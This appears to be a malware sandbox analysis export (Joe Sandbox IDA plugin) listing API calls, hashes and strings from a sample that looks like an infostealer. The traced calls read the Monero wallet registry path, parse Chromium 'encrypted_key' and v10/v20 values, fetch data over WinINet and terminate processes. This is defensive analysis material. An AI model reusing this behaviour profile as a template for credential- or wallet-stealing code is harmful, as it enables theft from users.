                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                            • String ID: Password
                            • API String ID: 356768136-3434357891
                            • Opcode ID: 5fe4e871fb024e7474a43688a5854becfc892d957983007411ac10802712eab9
                            • Instruction ID: 734bdb36477751bc9aeb5b840e3be4691ef52e5505f365f0626e03164c2228f1
                            • Opcode Fuzzy Hash: 5fe4e871fb024e7474a43688a5854becfc892d957983007411ac10802712eab9
                            • Instruction Fuzzy Hash: 37711DB1D4021DABDB10DF95DC849DEFBF8EF44300F1045A9E609A7250EB71AE89CBA0
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,00B14F39), ref: 00B24545
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00B2454C
                            • wsprintfW.USER32 ref: 00B2455B
                            • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 00B245CA
                            • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 00B245D9
                            • CloseHandle.KERNEL32(00000000,?,?), ref: 00B245E0
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                            • String ID: %hs
                            • API String ID: 885711575-2783943728
                            • Opcode ID: c5162009ecb67202fdb141bc6ebba5df8dfe9c3e83bb7df26425b4736ce3e6b2
                            • Instruction ID: 8c5cbb02dbfc9d09ef788c50386b4891f4b51e67da0af97fad0ec1739f484687
                            • Opcode Fuzzy Hash: c5162009ecb67202fdb141bc6ebba5df8dfe9c3e83bb7df26425b4736ce3e6b2
                            • Instruction Fuzzy Hash: 3F315072A00315ABDB10DBA4EC45FDEB7B8EF45700F104155FA09E7280DBB0AA458BA5
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B01135
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00B0113C
                            • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00B01159
                            • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00B01173
                            • RegCloseKey.ADVAPI32(?), ref: 00B0117D
                            Strings
                            • wallet_path, xrefs: 00B0116D
                            • SOFTWARE\monero-project\monero-core, xrefs: 00B0114F
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                            • API String ID: 3225020163-4244082812
                            • Opcode ID: 1f0130a10c699bed182389dfd1580d0103ab288d0911cf36261d42751f40b0a8
                            • Instruction ID: 7d4df9c6cffc0b98635446080b91fa3aa92d3e2f28670a0dc2d7399fbad89eaa
                            • Opcode Fuzzy Hash: 1f0130a10c699bed182389dfd1580d0103ab288d0911cf36261d42751f40b0a8
                            • Instruction Fuzzy Hash: F3F01DB5640308BBD7149BA59C8DEAABB7CEB04715F100194BE05E2290EAB05A4497B0
                            APIs
                            • memcmp.MSVCRT(?,v20,00000003), ref: 00B09E04
                            • memcmp.MSVCRT(?,v10,00000003), ref: 00B09E42
                            • LocalAlloc.KERNEL32(00000040), ref: 00B09EA7
                              • Part of subcall function 00B271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00B271FE
                            • lstrcpy.KERNEL32(00000000,00B34C48), ref: 00B09FB2
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpymemcmp$AllocLocal
                            • String ID: @$v10$v20
                            • API String ID: 102826412-278772428
                            • Opcode ID: 05bc09ca6e3f5b0a31620cf9e0b38ae481caf0c4250e47f4e842fe55e32e2428
                            • Instruction ID: b0bfe06ff443721327cc8b5e7d126d366351333938a8d869404611c2f1a1d6be
                            • Opcode Fuzzy Hash: 05bc09ca6e3f5b0a31620cf9e0b38ae481caf0c4250e47f4e842fe55e32e2428
                            • Instruction Fuzzy Hash: A051AE31A1021A9BDB10EF68DC85B9E7BE8FF50314F1544B4F949EB292DB70ED098B90
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00B0565A
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00B05661
                            • InternetOpenA.WININET(00B2CFEC,00000000,00000000,00000000,00000000), ref: 00B05677
                            • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00B05692
                            • InternetReadFile.WININET(?,?,00000400,00000001), ref: 00B056BC
                            • memcpy.MSVCRT(00000000,?,00000001), ref: 00B056E1
                            • InternetCloseHandle.WININET(?), ref: 00B056FA
                            • InternetCloseHandle.WININET(00000000), ref: 00B05701
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                            • String ID:
                            • API String ID: 1008454911-0
                            • Opcode ID: e33b81075f7ae89914fb9d282ad6ba6383f6154c5366a4befc3b73c52bbcde9d
                            • Instruction ID: 74c0b45d718f26b4ddc0d553cf16d7f47e5f08079bc0a6c3ee7b02c5cae2c66b
                            • Opcode Fuzzy Hash: e33b81075f7ae89914fb9d282ad6ba6383f6154c5366a4befc3b73c52bbcde9d
                            • Instruction Fuzzy Hash: F3414C71A00705AFDB24CF54DD88B9ABBE8FF48300F1480A9E909DB291D771AD42CFA4
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00B24759
                            • Process32First.KERNEL32(00000000,00000128), ref: 00B24769
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00B2477B
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B2479C
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00B247AB
                            • CloseHandle.KERNEL32(00000000), ref: 00B247B2
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00B247C0
                            • CloseHandle.KERNEL32(00000000), ref: 00B247CB
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                            • String ID:
                            • API String ID: 3836391474-0
                            • Opcode ID: cc19b7db019fb1bd60e478d0bdc58f13a809250cde874bb136adfa373eb532d8
                            • Instruction ID: 145ac674d7cc1d68f293f64bf40f57103c4acce608ab5238f453b433fd2bf2b3
                            • Opcode Fuzzy Hash: cc19b7db019fb1bd60e478d0bdc58f13a809250cde874bb136adfa373eb532d8
                            • Instruction Fuzzy Hash: 62017571601324ABE7215B70ACC9FEAB7BCEF49751F0006D4F919D12A1EFB49D908A70
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 00B18435
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1846C
                            • lstrlen.KERNEL32(00000000), ref: 00B184B2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B184E9
                            • lstrlen.KERNEL32(00000000), ref: 00B184FF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1852E
                            • StrCmpCA.SHLWAPI(00000000,00B34C3C), ref: 00B1853E
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 5fe1289647bac9f9b747de531a1f55eb8ed7a3c2cfc46700cae33b2806ba21a6
                            • Instruction ID: 8cb7de8e722d11923c61b6e12b06a9812e16dee50cdccdee0fa661698065924c
                            • Opcode Fuzzy Hash: 5fe1289647bac9f9b747de531a1f55eb8ed7a3c2cfc46700cae33b2806ba21a6
                            • Instruction Fuzzy Hash: 275160715002069FCB24DF68D998A9ABBF5FF58700F248499EC46DB345EF30E985CB60
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00B22925
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00B2292C
                            • RegOpenKeyExA.ADVAPI32(80000002,0186BE18,00000000,00020119,00B228A9), ref: 00B2294B
                            • RegQueryValueExA.ADVAPI32(00B228A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00B22965
                            • RegCloseKey.ADVAPI32(00B228A9), ref: 00B2296F
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: CurrentBuildNumber
                            • API String ID: 3225020163-1022791448
                            • Opcode ID: 4f2866399bc49f58d4b60a78ca3c8e51283a6e9fae989acda73772c9a55c0774
                            • Instruction ID: e18067eb16412a07da3fbcc5ff4e330913dcbbd8cbcb3315897d00dcd7491a7f
                            • Opcode Fuzzy Hash: 4f2866399bc49f58d4b60a78ca3c8e51283a6e9fae989acda73772c9a55c0774
                            • Instruction Fuzzy Hash: 4D017C75600329BBD724CBA4EC59EBBBBBCEB48755F200098FE49D7350EA71594887A0
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00B22895
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00B2289C
                              • Part of subcall function 00B22910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00B22925
                              • Part of subcall function 00B22910: RtlAllocateHeap.NTDLL(00000000), ref: 00B2292C
                              • Part of subcall function 00B22910: RegOpenKeyExA.ADVAPI32(80000002,0186BE18,00000000,00020119,00B228A9), ref: 00B2294B
                              • Part of subcall function 00B22910: RegQueryValueExA.ADVAPI32(00B228A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00B22965
                              • Part of subcall function 00B22910: RegCloseKey.ADVAPI32(00B228A9), ref: 00B2296F
                            • RegOpenKeyExA.ADVAPI32(80000002,0186BE18,00000000,00020119,00B19500), ref: 00B228D1
                            • RegQueryValueExA.ADVAPI32(00B19500,0187EA80,00000000,00000000,00000000,000000FF), ref: 00B228EC
                            • RegCloseKey.ADVAPI32(00B19500), ref: 00B228F6
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: Windows 11
                            • API String ID: 3225020163-2517555085
                            • Opcode ID: c7a27d32c9d6fe960984a41cb369500c24fe74c47048f9e4e4dbcbc7f35c52f4
                            • Instruction ID: a2eaa95496d801319d88b38d32c1ab63ceadc4757dfbb418f493dc01243019de
                            • Opcode Fuzzy Hash: c7a27d32c9d6fe960984a41cb369500c24fe74c47048f9e4e4dbcbc7f35c52f4
                            • Instruction Fuzzy Hash: 4C01AD75A00318BBDB149BA4EC89EAAB7BCEB44311F000198FE08D6390DAB09A4497B0
                            APIs
                            • LoadLibraryA.KERNEL32(?), ref: 00B0723E
                            • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00B07279
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00B07280
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00B072C3
                            • HeapFree.KERNEL32(00000000), ref: 00B072CA
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00B07329
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                            • String ID:
                            • API String ID: 174687898-0
                            • Opcode ID: c862886dd147f34b3bd8f6841fe05f207e220d5a462f76aa499f74cc0b0a263c
                            • Instruction ID: 4d1c1b59a48832f2e45fcc283c6b9eb3bf96770327023cffee4ee27389789e38
                            • Opcode Fuzzy Hash: c862886dd147f34b3bd8f6841fe05f207e220d5a462f76aa499f74cc0b0a263c
                            • Instruction Fuzzy Hash: 55415B71B447069BEB20CF69DC84BAAF7E8FB85305F1445A9EC49C7390EA71F901DA60
                            APIs
                            • lstrcpy.KERNEL32(00000000), ref: 00B09CA8
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00B09CDA
                            • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00B09D03
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
